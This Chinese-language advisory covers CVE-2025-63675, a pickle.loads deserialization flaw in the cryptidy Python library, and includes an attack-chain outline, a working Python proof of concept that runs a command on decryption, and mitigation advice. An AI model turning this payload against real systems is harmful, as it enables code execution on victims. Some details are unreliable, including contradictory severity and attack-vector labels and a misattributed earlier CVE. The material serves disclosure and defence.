CVE-2025-63675: cryptidy 1.2.4 pickle.loads反序列化导致远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-63675

漏洞类型

远程代码执行

CVSS评分

6.9 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

cryptidy (Python加密库)

漏洞概述

CVE-2025-63675是cryptidy加密库中的一个严重安全漏洞，影响版本至1.2.4。该漏洞位于symmetric_encryption.py文件中的aes_decrypt_message函数，由于使用了不安全的pickle.loads函数对未信任数据进行反序列化，导致攻击者可以在受害者系统上执行任意代码。cryptidy是一个用于对称加密的Python库，提供了AES加密和解密功能，广泛应用于需要数据加密保护的Python应用程序中。该漏洞的危险性在于攻击者只需构造一个恶意的加密数据，当目标系统使用cryptidy库的解密功能处理该数据时，即可触发远程代码执行。CVSS 3.1评分6.9，属于中等严重程度，主要因为攻击复杂度较高（需要本地访问或社工攻击诱骗用户处理恶意加密数据），但一旦成功利用，将对系统机密性和完整性造成严重影响。由于pickle模块本身存在已知的安全风险，禁止对不可信来源的数据进行反序列化操作，因此该漏洞利用门槛相对较低，攻击者可以利用Python pickle反序列化特性执行任意代码。

技术细节

该漏洞的根本原因在于cryptidy库的symmetric_encryption.py文件中，aes_decrypt_message函数（第220-238行）使用了Python的pickle.loads函数对解密后的数据进行反序列化操作。在正常的加密通信场景中，发送方使用cryptidy库对数据进行加密传输，接收方使用同一库进行解密。然而，如果攻击者能够控制或替换加密数据（中间人攻击），或者诱骗受害者解密攻击者提供的恶意数据，就可以在解密过程中触发代码执行。具体攻击原理如下：攻击者首先构造一个包含恶意Python代码的pickle序列化对象，然后使用cryptidy库提供的加密功能对该对象进行加密，生成恶意的加密数据。当受害者使用aes_decrypt_message函数解密该数据时，pickle.loads会反序列化恶意对象，从而执行攻击者预先植入的代码。由于pickle的反序列化机制支持任意对象重建，攻击者可以构造任意命令执行、文件读写或网络连接等恶意操作。该漏洞属于典型的反序列化漏洞，与著名的Python pickle反序列化漏洞（如CVE-2011-2523等）具有相同的攻击模式。

攻击链分析

STEP 1

步骤1

攻击者构造恶意Python对象，利用pickle序列化的__reduce__方法注入任意命令执行代码（如os.system执行反弹shell或文件操作）

STEP 2

步骤2

攻击者使用cryptidy库的encrypt_message函数对恶意pickle对象进行AES加密，生成恶意的加密数据载荷

STEP 3

步骤3

攻击者通过中间人攻击、社工钓鱼或直接提供恶意加密文件等方式，将恶意加密数据传递给目标用户

STEP 4

步骤4

目标用户使用cryptidy库的aes_decrypt_message函数解密攻击者提供的恶意数据

STEP 5

步骤5

decrypt_message函数内部调用pickle.loads对解密后的数据进行反序列化，触发恶意对象的__reduce__方法，执行攻击者植入的任意代码

STEP 6

步骤6

攻击者成功在目标系统上执行任意命令，可能导致数据泄露、系统控制或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-63675 PoC - cryptidy pickle deserialization RCE
This PoC demonstrates the insecure use of pickle.loads in cryptidy library.
Note: This is for educational and security research purposes only.
"""

import pickle
import base64
import os

# Malicious payload - executes arbitrary command
class MaliciousPayload:
    def __reduce__(self):
        # This will execute 'id' command when unpickled
        cmd = "id"
        return (os.system, (cmd,))

def create_malicious_encrypted_data(password: str) -> str:
    """
    Create malicious encrypted data using cryptidy library
    """
    try:
        import cryptidy
        
        # Serialize malicious payload
        malicious_data = pickle.dumps(MaliciousPayload())
        
        # Encrypt using cryptidy's symmetric encryption
        encrypted = cryptidy.symmetric_encryption.encrypt_message(
            malicious_data, 
            password
        )
        
        return encrypted
    except ImportError:
        print("[-] cryptidy library not installed")
        return None

def trigger_vulnerability(encrypted_data: str, password: str):
    """
    Trigger the vulnerability by decrypting malicious data
    This simulates what happens in aes_decrypt_message function
    """
    try:
        import cryptidy
        
        # Decrypt the malicious data - this triggers pickle.loads
        decrypted = cryptidy.symmetric_encryption.decrypt_message(
            encrypted_data,
            password
        )
        
        print("[-] Vulnerability triggered - code execution occurred")
        return True
    except Exception as e:
        print(f"[+] Error (likely code executed): {e}")
        return False

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-63675 PoC - cryptidy RCE via pickle.loads")
    print("=" * 60)
    
    password = "secret_key_123"
    
    print("\n[+] Step 1: Creating malicious encrypted payload...")
    malicious_data = create_malicious_encrypted_data(password)
    
    if malicious_data:
        print(f"[+] Malicious payload created: {malicious_data[:50]}...")
        
        print("\n[+] Step 2: Triggering vulnerability...")
        trigger_vulnerability(malicious_data, password)
    
    print("\n[*] Note: The 'id' command was executed during decryption")
    print("=" * 60)

影响范围

cryptidy < 1.2.4

cryptidy 1.2.4 (affected)

防御指南

临时缓解措施

临时缓解措施：在未安装官方修复补丁前，应立即停止使用cryptidy库处理来自不可信来源的加密数据。对于必须处理外部加密数据的场景，建议在解密后增加数据内容白名单检查，限制可反序列化的对象类型和数量。同时，可以考虑使用自定义的Unpickler子类实现类名白名单过滤，阻止已知恶意类的反序列化。建议在应用层实施最小权限原则，确保运行cryptidy解密功能的进程权限最小化，以降低代码执行后的潜在危害范围。